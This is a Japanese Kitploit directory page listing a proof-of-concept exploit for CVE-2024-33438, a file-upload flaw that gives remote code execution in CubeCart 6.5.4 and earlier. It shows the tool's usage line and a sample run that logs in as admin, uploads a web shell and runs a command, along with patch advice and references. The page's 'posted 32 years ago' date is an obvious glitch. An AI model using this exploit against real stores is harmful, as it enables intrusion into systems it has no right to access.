Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-33438 — CubeCart <= 6.5.4 は、任意のファイルアップロードによりリモートコード実行 (RCE) に至る脆弱性があります。 | Kitploit
ツール/GitHubGitHub/julio-cfa/cve-2024-33438
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubjulio-cfa/cve-2024-33438

CVE-2024-33438

CubeCart <= 6.5.4 は、任意のファイルアップロードによりリモートコード実行 (RCE) に至る脆弱性があります。

リポジトリを見る
32年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

任意ファイルアップロードによるRCE (CVE-2024-33438)

CubeCart <= 6.5.4 は、任意ファイルアップロードの問題によりリモートコード実行(RCE)に脆弱です。この脆弱性は、アプリケーションのファイルマネージャとそのフィルタに影響を及ぼし、攻撃者が悪意のあるコードを含む.pharファイルをアップロードすることを可能にします。この脆弱性を修正するセキュリティパッチが実装されたCubeCart 6.5.5に更新する必要があります。

詳細については、参考文献にあるCubeCartの公式発表を参照してください。

エクスプロイト

自動化された概念実証(PoC)が作成されていますが、この脆弱性はファイルマネージャを介して悪意のある.pharファイルをアップロードすることで手動で悪用することも可能です。

以下はPoCの使用方法です:

root@kitploit:~
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

実行後、正常な悪用に対する期待される出力は以下の通りです:

root@kitploit:~
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

参考文献

  • https://forums.cubecart.com/topic/59046-cubecart-655-released-minor-security-update/
  • https://github.com/cubecart/v6/issues/3570
  • https://github.com/cubecart/v6/commit/31a5ec39b0924b2111fbc3aa419bd8c5c3fc1841
  • https://www.cve.org/CVERecord?id=CVE-2024-33438
  • http://blog.cat22.io/blog/cve/cve-2024-33438.html
ツールをダウンロード